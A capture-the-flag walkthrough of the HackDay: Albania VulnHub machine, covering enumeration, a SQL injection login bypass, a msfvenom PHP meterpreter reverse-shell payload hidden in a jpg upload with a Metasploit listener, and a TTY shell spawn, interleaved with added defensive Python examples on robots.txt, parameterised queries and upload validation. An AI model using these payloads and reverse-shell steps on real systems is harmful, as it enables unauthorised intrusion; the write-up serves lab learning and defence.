HackDay: Albania (CTF)
By Hud Seidu Daannaa
The VM is available at https://www.vulnhub.com/entry/hackday-albania,167/
==============================================
==============================================
1.
HOST DISCOVERY
___
Host discovery can be done with Netdiscover or Nmap; we chose Netdiscover. We scan the network in order to identify the target machine:
$ netdiscover -i eth1 -r 192.168.99.100/24
Currently scanning: 192.168.99.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
___________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.99.100 08:00:27:98:0d:5f 1 60 Cadmus Computer Systems
==============================================
==============================================
2a.
PORTSCAN
___
Using Nmap in its default configuration to scan for open, closed, or filtered port states:
nmap 192.168.99.100
Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-24 13:32 EST
Nmap scan report for 192.168.99.100
Host is up (0.00024s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
8008/tcp open http
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
==============================================
==============================================
2b.
CHOSEN PORT TO ENUMERATE
___
There are two open ports. SSH requires a login and most likely a brute-force attack, so, given the time factor, we will focus on the web server, which runs on the non-standard port 8008. Again we use the Nmap Scripting Engine to enumerate this service:
nmap -p 8008 --script http-enum 192.168.99.100
Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-24 13:33 EST
Nmap scan report for 192.168.99.100
Host is up (0.00020s latency).
PORT STATE SERVICE
8008/tcp open http
| http-enum:
| /robots.txt: Robots file
|_ /js/: Potentially interesting folder
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.91 seconds
==============================================
==============================================
2c.
FURTHER ENUMERATION
___
Using the Nmap Scripting Engine together with the service detection option -sV to enumerate the robots.txt file:
nmap 192.168.99.100 -p8008 -sV --script http-robots.txt
Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-24 13:34 EST
Nmap scan report for 192.168.99.100
Host is up (0.00020s latency).
PORT STATE SERVICE VERSION
8008/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 26 disallowed entries (15 shown)
| /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/
| /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/
| /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/
|_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.54 seconds
==============================================
==============================================
3a.
ANALYSING THE CONTENT OF THE ROBOTS.TXT FILE
___
Opening the web address in the browser
http://192.168.99.100:8008
From the Nmap Scripting Engine output we perform further analysis on the robots.txt file, using a few bash one-liners to fetch and inspect each path from the scan:
$ curl -s 192.168.99.100:8008/robots.txt | grep '^Disallow:' | cut -d "/" -f2 > file1
$ touch file2
$ while read line; do wget -q -O "$line" "192.168.99.100:8008/$line/"; done < file1
$ while read line; do echo "$line"; cat "$line"; echo "--"; done < file1 >> file2
$ while read line; do rm "$line"; done < file1
$ rm file1
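The one-liners above do the job with cut and a loop. The same parsing done properly, as an added example that is not part of the original write-up: a small robots.txt parser that honours comments, blank lines and User-agent groups, plus a helper that reproduces the cut -d "/" -f2 step. The sample robots.txt is constructed for the example (two of the path names are taken from the Nmap output above, the rest are placeholders). The defender's point is the one this box teaches: robots.txt is a public file, so a Disallow entry advertises a path rather than hiding it.

```python
# Constructed sample, modelled on the structure of a robots.txt file.
# Two path names come from the Nmap output; the others are placeholders.
SAMPLE_ROBOTS = """\
# robots.txt for a fictional site
User-agent: *
Disallow: /rkfpuzrahngvat/
Disallow: /unisxcudkqjydw/
Allow: /public/

User-agent: Googlebot
Disallow: /private/   # trailing comment
"""


def parse_robots(text):
    """Return {user_agent: {"allow": [...], "disallow": [...]}}.

    Comments (#) and blank lines are ignored, field names are matched
    case-insensitively, and consecutive User-agent lines form one group
    that the following Allow/Disallow directives apply to.
    """
    groups = {}
    current = []        # user-agents the following directives apply to
    last_field = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line or ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if last_field != "user-agent":       # start a new group
                current = []
            current.append(value)
            groups.setdefault(value, {"allow": [], "disallow": []})
        elif field in ("allow", "disallow") and current:
            for agent in current:
                groups[agent][field].append(value)
        last_field = field
    return groups


def disallowed_dirs(groups, agent="*"):
    """First path component of each Disallow entry for one agent,
    mirroring the `cut -d "/" -f2` step of the shell one-liner."""
    dirs = []
    for path in groups.get(agent, {}).get("disallow", []):
        first = path.strip("/").split("/", 1)[0]
        if first and first not in dirs:
            dirs.append(first)
    return dirs


if __name__ == "__main__":
    parsed = parse_robots(SAMPLE_ROBOTS)
    for agent, rules in parsed.items():
        print(agent, rules)
    print("top-level disallowed dirs:", disallowed_dirs(parsed))
```

Every directory this returns is one the site owner chose to publish in a world-readable file; anything that must stay private belongs behind authentication, not in robots.txt.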
==============================================
==============================================
3b.
Accessing file2, we obtained the following result:
unisxcudkqjydw
IS there any /vulnbank/ in there ???
==============================================
==============================================
4.
DIR TRAVERSING
===
Following that hint, we traverse the directories accordingly:
http://192.168.99.100:8008/unisxcudkqjydw/vulnbank/client
Bam !!!
there it is, a login.php
==============================================
==============================================
5.
NIKTO
===
It is always good practice to run Nikto, since it automates many publicly known checks and can save time; there is also no harm in running it.
$ nikto -h http://192.168.99.100:8008/unisxcudkqjydw/vulnbank/client/
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.99.100
+ Target Hostname: 192.168.99.100
+ Target Port: 8008
+ Start Time: 2016-11-20 20:20:06 (GMT7)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.0.8-0ubuntu0.16.04.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ Root page / redirects to: login.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1/unisxcudkqjydw/vulnbank/client/images/".
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ /unisxcudkqjydw/vulnbank/client/config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /unisxcudkqjydw/vulnbank/client/images/: Directory indexing found.
+ OSVDB-3268: /unisxcudkqjydw/vulnbank/client/images/?pattern=/etc/*&sort=name: Directory indexing found.
+ /unisxcudkqjydw/vulnbank/client/login.php: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2016-11-20 20:20:15 (GMT7) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The notable findings above are potential opportunities and useful information we could exploit; I will keep them up my sleeve.
==============================================
==============================================
6.
SQL INJECTION
===
The presence of a username and a password field promises a database behind the form.
From the page source, or using a proxy tool like Burp Suite or ZAP, we can tell the form is submitted with a POST request; unlike the usual GET-based case, a POST-based SQLi is exploited slightly differently.
We can capture the POST request with a proxy tool or, better still, try some manual inputs to see if we are in luck. After a handful of attempts we finally arrived at:
admin'%20# (where %20 is the URL encoding of a space)
The above input logged us in through the login page.
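Why that input works, and what the fix looks like, as an added example that is not code from the VM or the original write-up. A login query built by string concatenation is placed next to the parameterised version. The table is a constructed in-memory SQLite database with a plaintext password for brevity (a real application stores a salted hash). SQLite's line comment is --, so the example uses admin' -- where the MySQL-backed page above used admin' #; the mechanism is the same: the quote closes the string literal and the comment discards the password check.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table standing in for the VM's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return conn


def build_vulnerable_query(username, password):
    """The user's text is spliced straight into the SQL statement."""
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


def login_vulnerable(conn, username, password):
    """String-built query: a quote in the input changes the statement."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row is not None


def login_hardened(conn, username, password):
    """Parameterised query: input is bound as data, never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' --"   # SQLite comment; the MySQL form on the page uses '#'
    print(build_vulnerable_query(payload, "anything"))
    print("vulnerable login accepted:", login_vulnerable(db, payload, "anything"))
    print("hardened login accepted:  ", login_hardened(db, payload, "anything"))
```

Printing the built query makes the problem visible: everything after the comment marker, including the AND password = ... clause, is gone. The parameterised version never rebuilds SQL text from input, so the same string is simply a username that does not exist.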
==============================================
==============================================
7.
ENTRY POINTS
===
Since the login page is a .php file, the application runs PHP code. After enumerating the web application with the aim of understanding how it works, we realized it accepts image uploads (jpeg, jpg, etc.).
To proceed we construct a payload. We start off by creating an empty jpg:
touch den.jpg
Generation of a reverse PHP meterpreter shell into a jpg:
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.99.90 LPORT=4444 -o file.php
cat file.php >> den.jpg
After creating the payload (with msfvenom from the MSF toolset, or alternatively SEToolkit), we start a multi/handler in msfconsole to receive the remote connection:
msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter_reverse_tcp
msf exploit(handler) > set LHOST 192.168.99.90
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > run
After firing up the multi-handler, it is now time to upload the jpg via the ticketing system. This results in a low-privilege shell.
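The upload succeeded because the application accepted a file that was a .jpg in name only (the write-up does not say what check it performed; the assumption here is that nothing beyond the filename was verified). As an added example, not code from the VM or the original write-up, this is the server-side validation a defender would want: an extension allowlist, a size limit, a check that the leading bytes really are the declared image type, a heuristic scan for embedded PHP or script tags, and a server-chosen random filename so the client's name never reaches disk. The sample inputs are constructed, including the empty file that touch den.jpg produces.

```python
import os
import secrets

ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}

# Leading bytes ("magic") of each accepted image type.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

MAX_BYTES = 2 * 1024 * 1024   # 2 MiB cap, an assumed policy value


def validate_upload(filename, data):
    """Return (ok, reason) for an uploaded file's name and raw bytes.

    The filename and Content-Type header are attacker-controlled, so the
    decision rests on the bytes themselves, not on what the client claims.
    """
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed"
    if not data:
        return False, "empty file"
    if len(data) > MAX_BYTES:
        return False, "file too large"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match declared image type"
    # Heuristic: a valid image header followed by PHP is still a polyglot.
    if b"<?php" in data or b"<?=" in data or b"<script" in data.lower():
        return False, "script content embedded in image"
    return True, "ok"


def stored_name(ext):
    """Random server-side name; double extensions in the client's name
    (shell.php.jpg) are discarded along with the rest of it."""
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed inputs: the empty jpg, the jpg with PHP appended, a
    # header-plus-PHP polyglot and a plausible JPEG/JFIF header.
    samples = {
        "den.jpg (empty)": ("den.jpg", b""),
        "den.jpg (php appended)": ("den.jpg", b"<?php echo 'x'; ?>"),
        "polyglot": ("pic.jpg", b"\xff\xd8\xff\xe0" + b"<?php echo 1; ?>"),
        "real-looking jpeg": ("photo.jpeg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"),
        "php extension": ("shell.php", b"\xff\xd8\xff"),
    }
    for label, (name, blob) in samples.items():
        ok, reason = validate_upload(name, blob)
        print(f"{label:26} -> {ok} ({reason})")
    print("stored as:", stored_name(".jpg"))
```

The byte-level checks raise the bar but are not the whole fix: the upload directory must also be served without script execution (no PHP handler for that path), and ideally the image is re-encoded through an image library so that any appended payload is dropped.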
==============================================
==============================================
8.
ESCALATING PRIVILEGES
===
Using python3 to spawn a TTY shell:
python3 -c 'import pty; pty.spawn("/bin/sh")'